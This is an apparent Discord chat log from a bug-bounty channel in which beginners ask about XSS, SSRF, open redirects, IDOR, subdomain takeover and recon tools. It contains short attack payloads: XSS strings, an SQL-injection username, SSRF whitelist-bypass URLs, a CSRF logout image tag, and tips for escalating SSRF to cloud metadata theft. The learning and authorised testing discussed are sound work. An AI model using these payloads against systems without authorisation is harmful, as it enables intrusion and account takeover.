I have found an IP on Shodan related to a target that returns this screen; upon looking with reverse DNS it points to some EC2 domain. Is there any apparent security issue with it? Any chance of EC2 domain takeover?
would it be okay if I post a link here for a platform that is currently being developed similar to bug bounty ?
I'd leave that up to the mods^
Hi
Hi, while doing static analysis on an Android APK via jadx, I have found a Google API key hardcoded in the resources.arsc/strings.xml file. Is it a security issue? Can the key be used for malicious purposes?
Depends on what the key is used for, Google utilises many and quite a few are useless
Tell you what?
Please don't call me bro. I don't understand how I can tell you "India".
Does THM have a Bug Bounty program?
TY
Gave +1 Rep to @abstract jolt
The Scope has to be confusing, lol, "Test our website, which is full of vulnerable machines, for any vulnerabilities" lol. JK I know you would have to be connected to the vpn to mess that up
Not the website?
I was joking...
can I do XSS with inline CSS injection in a div?
<div class="UserProfile" style="background-image: url('injection_here')">
</div>
limits: cloudflare WAF and " gets escaped to "
' doesn't
when the url is set to ');csshere I can inject CSS^
You mean something like this... ?"background-image: url('https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpicfiles.alphacoders.com%2F265%2Fthumb-1920-26551.jpg&f=1&nofb=1'); width: auto; height: auto;"
no
thats CSS injection
I want to be able to execute code
you could set the BG image as your own "image" that just contains JS, can't you?
don't think so?
or idk what you mean
Inject the url as a real URL, but have the contents of the "Image" just be a js file
are you sure that would work?
I have no idea, but I think I saw something similar at some point haha
there's a website that has those things built in so you don't have to make a website
isn't that <script src=x.com>?
I think it could work if you have the <script> thing in the remote "image"
do you control the image?
I don't think that's how HTML works
you can't just inject HTML tags into CSS
You could do it with an SVG though
Link to an SVG that contains code
No idea if that would work with inline CSS 🤷♂️
It would have to be an iframe
Tags like img don’t execute the code inside SVGs 
I am having issues decompiling a .lua file, appears to have a "LuaQ" header, but unlua and luadec have not been able to decompile it 😦 (has issues with the chunks)
bad header in precompiled chunk
The input chunk reports an invalid code for lua number integrality: 4
Any ideas?
hello everyone
I'm dealing with the buffer overflow in windows 10
I find that I have to disable the DWORD value under HTTP from the registry
but I didn't find this value
is there any other solution?
Hey !
Can anyone suggest a good wordlist for fuzzing web directories? I'm using the following wordlist with ffuf:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt
Hey, yea I thought you were asking if you could pull off CSS injection, but after reading other answers, I got an idea...you can embed anything into a QR code (quickly with MSFT Edge), could you embed a link or something and the execution 'trigger' would be the scanning of the QR...
Thank you for sharing
Gave +1 Rep to @heavy anvil
Hey guys.
I'm new to cybersecurity
Suggest me a certification pathway/roadmap journey
Roadmap to my knowledge.
eJPT-->SEC+-->CEH--->eWPT
Any suggestions please?
CEH only for India,
eJPT doesn't really provide that much; on INE you have the free course if you want to walk through it.
Sec+ is usually a go-to cert; some people recommend you do Net+ and A+ before so you have the foundation for Sec+.
Also this isn't the channel for this; go to #cyber-and-careers
Thank you Miccull.
Can you please suggest me the best resources to learn networking before I start Sec+?
Gave +1 Rep to @whole tide
Got a little bored and learned Rust. Made a pretty cool tool that'll grab URLs off of web.archive.org and then filter the list by what responds back from a basic HTML tag escape, if anyone is interested
https://github.com/frostb1ten/PizzaHunt
I have been researching about cors on pre-auth pages, but can't find enough materials, anyone got any idea?? Or could point in the right direction? If it's actually worth researching for?
guys,
which path is for bug-bounty on THM?
THM doesn't have a dedicated Bug bounty path.
Probably best to look at the “How The Web Works” module and look at ZTH obscure web vulnerabilities 1 and 2
The nahamstore room is a good one for bug bounty
Longest I've spent on completing a room tbh
Wait until Osiris / Theseus...
Assuming medium rooms
Insane.
You English bad
It better than you
I gooder, you worser.
!docs bug-bounty
Can anyone tell me how to report an information leakage vulnerability?
on TryHackMe?
No on other website
look for the website's bug bounty program, try emailing support and asking where to email for bug bounty, go to /.well-known/security.txt.
How can I perform XSS if "<" is blocked?
hey guys
which tryhackme room/path is best to learn bug bounty
and how to practice them before going to bug bounty platforms
?
If < and > are blocked, your last resort is attribute injection
I can perform attribute injection only when the value goes into the attributes like value="what i enter"
But that's not the case the value which i enter simply goes into the body
It's actually a challenge in OWASP Vulnerable Web Application, master
Xss level 5
answer to question two is on the tryhackme page. answer to question one depends on what you like to do, and maybe what you already know how to do
also I can't see the end of that str_replace call? does it also block >? does it block ";
i think depending on the browser you could also use maybe b64 encoded < ?
someone else will probably have a reason that i am incorrect
It only blocks the "<" character
I will check for it let's see
I had a question
what's the use of APP_CENTER_SECRET?? I do know that it's used while building apps and it makes a call to the REST APIs, but does it pose a security risk?
I tried searching google for it, But I can't seem to understand it
From what I've found that key tends to be used more for sending telemetry data rather than holding any sort of auth purposes so doesn't pose much of a security risk
Hi everyone, I have a question
While doing a bug bounty, I found a CVE on a subdomain of the website; the subdomain is neither mentioned in In-Scope nor in Out-Of-Scope. For your information, the CVE is CVE-2021-26085.
Now I am confused, should I directly report the vuln or not...
I think you should report it .
@brisk shoal in that case you should be able to escape by using a value ending with "; for $user
well, you'd put your injection after the ";
which would execute as the next call after that echo
np
I'd do a basic poc that shows something that you'd only find with this cve and report it
Besides a small PoC I'd recommend erring on the side of caution until they respond to the basic PoC. Then if they request additional information to improve severity etc you can find what you need to flesh it out
Ok got it
Hello Friends
I have a challenging VM box for which I need to get root. Anybody interested here please DM me, as I am stuck somewhere and need guidance. It would be great learning for you as well, as it's not an easy box.
I need a complete POC
Hello everyone I have a question regarding open redirects
This example URL is vulnerable to open redirect, but the condition is that the URL needs to start with "/"
https:www.some_website_.com/redirect.php?uri=/
We can bypass this by using "//"
now the url becomes
https:www.some_website_.com/redirect.php?uri=//www.google.com
Here I am redirecting to google.com
I want to know how "//" is able to bypass it and redirect to google.com
/ is redirecting you to the home page but // is redirecting you to another page, but regardless, open redirect is often considered a low to informative bug. While looking for open redirect, try to chain it with something else like XSS or CSRF, since there is a very low possibility you will be rewarded for only open redirect. This is because it's low impact and also it's a low hanging fruit which will be 99% duplicate.
How much time do you usually enumerate before finding a bug? I haven't really tried any programs yet because they all look like they've been tested 100 million times
Hey y'all, I've been meaning to ask this for quite a bit... What's the most formal way to ask a company about their vulnerability payouts, even if they aren't a part of any bug bounty programs? I've found two CVEs, both ranked as critical 9.8s, but I'm not sure how I should ask about their payouts, if they even have any.
@stray tapir Enumeration is actually a continuous process. Continuous enumeration of target daily. Or you can use automation.
My enumeration for bug-bounty is mostly finding weird places and hoping they are in scope, and then just mapping the places out (inputs mainly) and after I have a few candidates I try them out, so basically look for weird and obscure places and things (ie. uploading an image that gets embedded via a path and using it for xss or something).
Can you explain how // is redirecting to another page
Hi bug hunters! I need a little help with a bug I may have found. I ran Burp Scanner on the site and it found "External service interaction (DNS)"; I confirmed with Burp Collaborator that it does a DNS lookup of type A for domains. My question is: how can I further exploit it?
How can I use ' or 1=1# as a username in Hydra?
Either you can put it in a file and act like it is a wordlist or you can use \ to escape the characters that cause problems.
Ok thanks
try ';alert(1)// or " onmouseover="alert(1);
any suggestions/tips heading to hackerone?
I was performing recon and found one subdomain; on visiting it, it gives "endpoint not found". Can there be a subdomain takeover vulnerability?
Great and beautiful explanation, this helped me 🙂 Thank you!
Gave +1 Rep to @uneven girder
Woaaaaaaaa
Hmmm
What is subdomain enumeration and why do we need to do it? Thanks
First things first, do you know what a subdomain is?
TBH I don't
Ok, that should be your starting point
I googled and the language was too hard for me to understand
Things will become a lot clearer after you understand that
Then you need to keep reading and researching
Alright thanks a lot sir
But can you explain to me in simple terms what a subdomain and a domain are too, if you don't mind?
I'm about to go and buy groceries, and this is definitely something you can read up about.
Hacking is all about research and learning.
Alright i appreciate your help
Hello, I wanted to start with Bug bounty.
Can I join with anyone who is ready to share his/her knowledge with live bug hunting, how to look, and everything? Any help is really appreciated. Thanks in advance 🙏🏻
A subdomain is the child of a domain; it’s a part of a domain
Hello guys, I am new to bug hunting. However, I was working on one of the programs at bugcrowd.
Where I created two accounts on a website, and with a tweak of userid parameter in the url, I can access the password change page of another user.
I reported this as an IDOR vulnerability, but the program owner discarded it, saying the password cannot be changed since you must know the password to change it.
But isn't it a vulnerability? Because you can access some other account's password change page.
I need help in building up from here. I have read blogs saying if you find an IDOR, try to make it into an XSS; can anyone help me with how to do that?
You can chain idor with xss, so basically in this case, if you find a self xss, and an idor that will allow you to make changes to that particular page, you can add the self xss payload to the victim account through IDOR and when they open that particular page, it will fire up your payload
Or if you can find a way to bypass the password change functionality, you can also use the idor to change the victim's password
I'm able to inject bytes like 嘍嘊, which would decode to %E5%98%8D%E5%98%8A, into the location header
is it possible to pull off CRLF injection / header injection?
webserver replies with location: https://xyz.com/img/.嘍嘊location: http://
^those are response headers
and yes, I can indeed do path traversal using /%2E%2E/%2E%2E/2E%2E%/2E%2E/
sucks that it's a redirect to storage.googleapis.com
Anyone here to help me out rooting a challenging box. I am stuck in rooting a box. There is a potential SSRF vulnerability and a jenkins instance running. Any assistance would be highly welcomed.
This doesn't sound like bug bounty
Can anyone help me with what exactly the function of the client_secret API key is? From what I have read, it's used for authorization and basically acts as a password. Recently I encountered an API key with the name
Google_api_client_secret while testing my university Android app.
Can anyone explain what its function is? Cause I tried reading a bit about it on Google docs but could not understand it
Hi, a client API secret key is most of the time a key for authentication (not authorization) on an API endpoint. An API endpoint is like a service that is exposed to clients so it can do something particular, based on the request the client makes.
Regarding your Android app, this secret key token may be used to authenticate and make requests to some Google APIs.
For example, this Google API (https://developers.google.com/adsense/host/v4.1/) can be used to interact with the Google AdSense service. A client can then make HTTP calls (CRUD based / CREATE READ UPDATE DELETE) with the secret token to authenticate itself, and then ask for information on related AdSense accounts on the GET /accounts/account_id endpoint (the client providing the account_id value). Hope it helps 👍
I seee, thanks a lot...i get it now😊
Ur welcome :)
Yes, this is not a bug bounty but rather a CTF-style assignment
What is an attack called where an attacker can send typical CSRF GET requests from the destination site using e.g. img tags?
e.g. <img src="/ajax/logout">
with this it'd be hard to show impact unless you could inject it in somewhere the user regularly sees, to cause a kinda DoS to the user
Yeah it's in the user profile pic
pretty much causes DoS
and teachers will be unable to launch tests because they will be logged out in the start menu of the test
sounds like a reasonable impact definitely
Yeahh I already reported that, the other day, just wanted to know what it was called
am currently trying to bypass mitigations because I'm able to upload any filetype to the url that the mitigation expects
what mitigations are in place?
a whitelist for /files/open/*md5hash*
uses regex and it's length sensitive, and it checks if the file exists
but no file extensions?
nope
well
when I upload a file it makes a new url using the hash (which I can use as a pfp)
and it does not check filetype upon using it as a profile picture
I see
try mess with the filename I guess, some null bytes maybe
but sounds reasonably secure
but you can upload html files no problem?
yeah
is the file rendered, or just downloaded
download
wait nvm rendered
also I forgot to say, the /files/open/md5hash endpoints redirect to storage.googleapi.com, with the corresponding hash
it's not saved on the site
I tried to inject CRLF and null bytes into the file extension (which is not filtered), but without success
and storage.googleapi.com is not in CORS
oh it's stored using google?
damn
try a hash collision
I wonder what would happen
maybe would just say file already exists
you mean the SHAttered hash collision etc?
that's for the SHA-1 hashing algorithm though right
yeah
also, that can't happen because the hash involves a unix timestamp I think
because it changes every time I upload it
oh so it's not just a direct hash of the file
nope, sadly not
can you race it to see if you get the same hash in the same second
just to confirm your theory
sounds pretty secure
hm yeah
wouldn't be surprised if it involved a unique id as well (it increments by 1 each time I upload)
but I'll try it out
I've reported several critical bugs before for that company, so I wouldn't be surprised if there's a way
h1 private programs
yeah
I've scanned a bit with burpsuite pro as well, but most of the vulnerabilities are stored and show up on other places so bs scanning barely helped
it did confirm a certain vulnerability, which I didn't know how to confirm
what was that vuln?
Maybe try to leverage existing HTML syntax to make your own tags?
anyone got any good resources to demonstrate app testing on OSX?... I've found a really odd quality of life feature which I think could have some interesting exploitation angles if it doesn't sanitize input correctly.
Hello everyone, it's regarding SSRF (Server Side Request Forgery)
Can someone tell me how these URLs work normally? I know that these payloads are bypassing whitelisting, but I want to know how the @, # and third highlighted case is working. For example:
http://www.anydomain.com@localhost:1245
http://www.anydomain.com.localhost:1234
Like, http://www.anydomain.com is itself sufficient; adding .localhost:1234 or @localhost:1234 must make the URL invalid. So how is the above URL able to fetch content, or how is it working and redirecting to localhost:1234?
For reference you can refer this :
https://portswigger.net/web-security/ssrf
I had a question
why does test+1@gmail.com amount to test@gmail.com sometimes?? and if test@gmail.com is the account of the victim, how can this be leveraged?
Hey
Hey guys, need your help .. any exploits I can use or tips for a PoC on Apache server version 2.4.6. I have found it’s vulnerable but just need to show an exploit for the PoC .. any tips or help will be highly appreciated
Why do people get paid very well for XSS attacks?
Given that they are extremely common
Hi all, I have a question about SSRF. I have a payload that popped up on my interactsh client, but what's a good way to actually verify fully that it works? interactsh connections just don't seem like a good PoC to me, if it is then let me know.
a callback should be alright with the poc of how you got that callback
you might want to try and escalate severity though
See if any interesting headers are passed
Or if you can return the output from the request
looks like I'm getting a 15-30h a week software testing job at a 30 emp company in the vacation
am incredibly excited, don't know my wage yet as I will have another meeting with the folks who do the paperwork
Because they can be impactful.
Impactful in what way?
Do you understand XSS?
Having code execution in their browser means you can control everything they can see and everything they could click on
I am understanding XSS more and more
You could redefine links to link them to phishing sites, you could change account numbers that they're sending money to (if you had an XSS on that page)
And this is all assuming the app has HttpOnly on its session cookies; otherwise you can just grab their cookie and take over their session
How many years did it take you guys to be able to successfully bounty hunt?
literally less than 6 months
depends on how much time you spend on it and how good your background in tech is
You are the XSS Bug-Bounty type person haha
perhaps
in the past few months I've been searching for more complex bugs such as race conditions, auth issues, etc
Right, so I have a question. I'm able to get an endpoint to make a GET request to a user-defined domain, when it shouldn't be. What can I actually do with this information? Can I get the target to download a file somehow? RCE somehow? I honestly have never encountered this behaviour.
Use collaborator and check if you get an HTTP request and a DNS request. Then it is SSRF!
Maybe u could escalate it to XSS or RCE.. Try it out
In the source code, I found an IP leading to an exposed Docker container. I am able to list the version, but there are no Docker images present when I tried to view the images, so is it worth reporting? Or is it expected behavior?
I'm using interactsh, but yeah same diff. It's definitely ssrf, but I'm trying to see if I can somehow host something on a domain that could lead to rce.
My main problem is that the input is an email field, so it'd have to be on the root domain only (ie, no url.com/file.sh, or anything like that)
Sorry, I am unaware about the RCE part. Btw, have you tried AWS metadata leakage through SSRF?
This could help you in getting security credentials (in some case temporary credentials). So you could use that to query the AWS metadata instance through SSRF.
Is it a DNS lookup?
or a HTTP request etc.
@wise skiff He said it's a GET request.. so HTTP. And if he has managed to do this, it's surely an SSRF. DNS lookup is also a part of SSRF but an HTTP request is the main confirmation for SSRF
I agree. Some ways would be escalate it to an XSS or AWS metadata leakage.. What else would you recommend?
well if he can only get the root of the website
maybe see if it follows redirects
that's probably his best bet
or see if any headers are passed
@mighty wigeon @wise skiff That's my question, I'm not sure what my options are as to escalating. I'll definitely give the redirect thing a go though
And no, there are no abnormal headers in the request
shoot
Tried internal port scans yet?
Update us on the situation as well. It's great discussing this and ur bug hunting process
what's the user agent
or was that header not sent
alr, I might have asked this question before, but how, as a teen, could I use HackerOne for bug bounty?
I'm unsure about that, sorry.
Hello everybody, I am aoxsin.
Hi
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
Which is... not current
huh, that's a weird user agent definitely
especially for a bot to visit that
how did the redirect go?
Haven't tried yet, I will now, but how can I set up something that would redirect where I can still capture the actual request?
I’d just set up a flask server on a VPS that points to something like requestbin
and just see if the requestbin gets hit
The other day i reported my first bug and i got paid 200 USD :)))
Wow thats incredible, what did you report?
And the bug is in the template they use for most of the websites they create
so i went to the portfolio of this company and made a script that checked how many of these websites were affected by the same exact payload
and it was over 100
@peak vapor I'm a manager for a webdev shop, I'd love to hear more about what you found & how ... I'm actually paying out my first bug bounty to another independent researcher for finding something unrelated to the web haha 😛 ... DM me sometime if you wanna chat about it 👍
thanks!
Gave +1 Rep to @lapis horizon
I hope those additional sites were in scope
👉 👈
No, but they didn't get mad about it 🙂
Congrats @peak vapor
Was it through a bug bounty platform
Or an individual disclosure
Can anyone suggest to me how I can bypass 403 (Forbidden) to see directory content?
Ping me if replying .
individual disclosure
Try using gobuster:
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<host>/<403_directory>/
Hi all, need a piece of advice. What would you suggest to automate the "technology lookup/built-with" part of a recon for a large scope of domains? Sadly the free API option of BuiltWith doesn't offer info on subdomains, so it's useless unless paid.
Hello everyone, will someone collaborate with me in finding my first bug?
Hey I have a question for anyone knowledgeable, I think I stumbled onto a bug on a website I was visiting. You could use a password with or without a symbol at the end to log into the same account, I'm assuming this is bad, correct?
yes
there’s some weird normalisation going on
can you create an account with a symbol on the end
Username with symbol or a password? I have no symbol on the back end of the current account but adding a symbol will still log me into the account. I'm thinking of reporting it but I want to be able to tell them succinctly what's going on, and I'm still new to this.
so
if you create two accounts say test and test$ (or whatever symbols work in this instance)
with different passwords
can you log into test with the password of test$
if that makes sense
It's definitely worth reporting regardless though, sounds funky
I know that it would def make a dictionary attack much easier, I'm going to report it, but I was trying to leverage some $$$
It would look great on a cyber resume 😛
I know ' ! ' for sure
okay, try to enumerate more I'd say
Ok I've tried '! @ #' at the end of the test pass on the new account and they are all accepted. How could this be exploited, I know using cupp.py to create custom wordlists and username lists could benefit, is there anything else I'm missing, I am reporting now.
@wise skiff
erm
did you try the account thing I mentioned previously
to check if you can access a *different account
if you can
that'd escalate it to full account takeover, which is normally a high/critical bug
Friendly tip: While doing this^ try only using accounts created by you
Yeah, don't ever attack accounts that don't belong to you
If you can't create more than one account, contact the site operators, tell them about the bug, and ask for a second one to prove it
admin&
:v
Well I assume if it strips symbols first then it should be querying DB for the hash of actual 'user' and not 'user' . [symbol] ... I can't think off the top of my head of how it would do otherwise but I'm sure this is still a should
I wrote about it as much I know, you can read it here
https://github.com/KathanP19/HowToHunt/blob/master/Status_Code_Bypass/403Bypass.md
and here is the POC video
https://youtu.be/J30KmyQetO0
hey guys, just a question: on Windows 10, would this be a bug worth investigating?
This doesn't seem overly related to bug bounty. Is this your video?
They posted that in a few channels, I know it's #963448752151101570
I did mean to tag you, but I didn't press enter.
403 Forbidden
Microsoft-Azure-Application-Gateway/v2
I'm at this page. Does anyone know a wordlist so that I can fuzz it further?
hi guys, I am a beginner and I want to start bug bounty. To identify minor bugs and earn minor amounts, which skillsets do I need to have? And which rooms do you recommend? Any recommendation is appreciated 🙂
thank you 🙂
Gave +1 Rep to @lapis horizon
while I was trying to send a curl request to a few IP addresses, I am getting this: <script> if(console && console.log) { console.log("host.value.ip.address"); console.log("Unable to resolve tenant with host value as IP."); } </script>
Any idea what it means?
hacking?
??
??
Can anyone suggest some good crawling tools?? I use gau, wayback... Would really love some other suggestions.. Especially if they are able to find parameters
There are some really good courses on Udemy you could pick up on a sale
@fallen palm Thank you, i will go after it. Do you have any suggestions?
Gave +1 Rep to @twin heath
I can't post a screenshot here but there's one that's near the five star range with nearly 15k reviews that I'm going to get when it's on sale. Scroll thru them and see what interests you.
Thank you :)
I saw one fitting your description and it was on sale for 11 more hours
Oh wow. Yep. $130 on sale for $20. BOUGHT.
How does prototype pollution happen in practice?
^which can't just be escalated to XSS
because the only way I can imagine it happening is eval(), but iirc you can just turn it into XSS at that point
Is Count.cgi vulnerable still?
I mean it depends on which side you're polluting, because you wouldn't do an XSS on the server side.
But in general it happens when an object is improperly/insecurely merged into another object (when it copies over prototype properties when it shouldn't)
And depending on the code that then used the object, it can have different outcomes
You could do prototype pollution in something like vue to pollute a template/component and that could result in xss
But you also could pollute the default object with a property that is not present normally in settings for another portion of the code and trigger unwanted behaviour
Hi all. Beginner here, struggling to identify potential targets. I use Intigriti (so as to not have huge competition from the main bugcrowd and hack1, etc).
I primarily know about IDOR, XSS, SQLi, and know next to nothing about mobile, so of course I've been going for web apps.
My issue is, at a glance and after initial recon of subdomains with live http requests and checking out various input fields using burp, I can't seem to identify which targets are more robust and which might be more beginner friendly.
is there some up to date cheat-sheet I can use to test for waf bypasses or for known vulnerable parameters and such?
essentially, I'd like to write-off targets that may be too difficult for someone at a more beginner level
intigriti isn't as small as you think 😄, it's pretty big in europe
i guess payloadsallthethings contains a bunch of starter things you can iterate on
yes I am based in the UK, another reason to go for that one. Are the smaller platforms worth taking a look at first? If so, could you recommend any? Thanks for the resource recommendation too
Gave +1 Rep to @thorn parcel
not sure if it's worth trying to try and look for smaller platforms, maybe someone else here has another opinion on that but i'd think that the amount of people - even when it does mean bigger potential competition - doesn't always mean that you will actually have that many competitors on a program, especially if you dig into it and don't stop at low hanging fruit
ok cool, that's good to know
Can anyone suggest how to learn to write XSS payloads?
I find it very difficult to solve XSS challenge labs
Learn JavaScript
What level of JavaScript? Basic, intermediate or advanced? Or studying JavaScript functions?
I think it depends on what level of lab you want to solve? I was formerly an intermediate web dev, and have ES6 in my skillset, I find it very helpful..
you can start with these links:
Why a re-introduction? Because JavaScript is notorious for being misunderstood. It is often derided as being a toy, but beneath its layer of deceptive simplicity, powerful language features await. JavaScript is now used by an incredible number of high-profile applications, showing that deeper knowledge of this technology is an important skill fo...
I got the point. I want to solve actually intermediate level xss labs.
Thanks for your suggestion
Gave +1 Rep to @merry elk
XSS is an injection of JavaScript code.
The payloads, therefore, are all written in JavaScript and/or the syntax used to call JavaScript.
Knowing what tools you have available to you when writing any kind of code is important if you want to do any kind of bypassing
Like if we’re talking about Linux command injection, to write your own payload, you need to know Bash to string things together effectively.
Or Python
/s
You know, people misunderstanding what they showed off in that presentation has gotten super annoying
Yeeeeeaaaaaaap
Is this about PyScript?
Mhm
I genuinely don't get the appeal of it other than having the ability to throw Python in some other place where you don't really need it
but I haven't looked into it too much
It's just a WASM python interpreter
Assuming it's still sandboxed, aye?
Yeah, it's WASM
password token leakage by referer header, but instead of it being leaked after clicking through to a third-party site like fb or insta, it's being leaked in the referer header on the same site... Is there any security impact because of this?
Am I the only one who doesn't see bug bounty as hacking?
when I think about hacking I think of exploiting that bug
Yeah but misconfigurations (which is most of the bug bounty reports)
like XSS, IDOR, et cetera. I wouldn't call that an exploit personally
(I know that XSS isn't a misconfiguration but .innerHTML instead of .innerText is the code equivalent of a typo)
For IDOR you're exploiting an authorisation flaw
For XSS, you're exploiting an injection flaw.
hey! I have a question about rate limiting, is anyone up to answer 😅 thanks in advance 😄
Hello, I am trying to bypass a login pop-up on a website. I tried googling, but cannot find anything. Can anyone guide me in the right direction. Any help/advice is appreciated and thanked in advance.
dmm
Is this part of a bug bounty program?
Hi guys, I'm developing something to improve encryption. MVP is ready. I don't want to break server rules and advertise, so please advise how to approach enthusiasts to give it a try and break a sample file? Thanks in advance!
So you want to roll your own crypto. Well, be careful. Be very careful.
Thanks, will check it!
Gave +1 Rep to @vocal folio
@vocal folio Yess
hey @vocal folio I have a question that is bug bounty related, but I was wondering if I could DM you first to help narrow down the scope of the question before I post it (I'm also not sure what questions I need to be asking in this unique situation, and I don't want to needlessly add confusion).
does anyone know if it’s possible to access/edit localstorage in the child iframe
It appears it’s possible to access the localstorage of the parent from within the iframe
but can’t find anything on the reverse
Not something I've looked into personally, but at a guess I would say no because it's crossing a security boundary between what the owner of the parent is allowed to edit and what the owner of the child is allowed to edit.
If you, as the developer of the parent, choose to include the child in an iframe then you're effectively trusting the child, but the child has not given you trust
Again, could be wrong, but that would be in line with most other browser security policies
Yeah looks like Same Origin Policy comes into play here
So I’d need to find a way to exploit that if I wanted it to work
Mhm
If it is a browser protection thing (and I would put money on that being the case) then you're gonna struggle to bypass it tbh -- especially for local storage rather than cookies
It’s a pain
If it was cookies I’d be able to get it
due to another vuln
And it’s a full ATO 
Can anyone explain this request to me:
GET /index.html HTTP/1.1
Host: example.com
X-Forwarded-HOST: website.com
Connection: close
So is client sending request to example.com/index.html
or
website.com/index.html
?
Thanks James! I went through this article earlier but I didn't understand it, that's why I asked here
Gave +1 Rep to @vocal folio
I mean to say, is example.com the final server which is handling the request and sending the response, or is website.com doing that?
You can make a request against example.com with any Host: header you want
changing Host will send the request to a different server, say from the above request website.com; it won't send the request to example.com, but the resource that I want to access is on example.com
No, changing the Host: header doesn't change the server it's going to.
okay, then what is the role of Host here?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-Host#:~:text=Host names and ports of reverse proxies (load balancers%2C CDNs) may differ from the origin server handling the request%2C in that case the X-Forwarded-Host header is useful to determine which Host was originally used.
This is the really important part about that header.
Okay thank you I will try to read it again
Gave +1 Rep to @vocal folio
Can somebody help me get a flag on a web-based challenge please?
Out of 5, I got 2 flags
This channel is for bug bounty
No, it's definitely not CTF
hi guys, I found an endpoint that redirects me to the home page when entering a /comment/. Does this mean I found a SQLi? And how can I prove it?
Hello everyone! I want to focus on bug bounty, but as a person without a background, I started with basic cyber security. As a beginner, your suggestions will be very valuable to me. I would be very happy if you share your suggestions with me.
well first do the pre-security path on https://tryhackme.com, then do the web fundamentals path.... and you should be decent at bug bounty after, probably
but just so you know, living off bug bounties is hard
it is more like a small pastime you can do a few times to have fun
Hi chat
I have this domain; when I browse it, it redirects me to domain.com/en/index.php
And I fuzzed at domain.com/FUZZ and found /phpmyadmin. When I open this path I get the source code of phpMyAdmin and I can see the source code of sql.php, but I couldn't find the DB name or anything sensitive
Should I report it ?
Hello, everyone
I found an SSRF on a web application, but the SSRF is on its WAF, Imperva. When reported, my report was closed as informational, stating it was out of scope for the organization to patch third party
Is there any way I could show its impact and get a valid report?
Thank you in advance.
This channel is for bug bounty
After 4 months I'm planning to attend a CTF; how do I get higher scores?
@wispy grove This channel is for bug bounty...
Any dedicated path for Bug Bounty on THM ?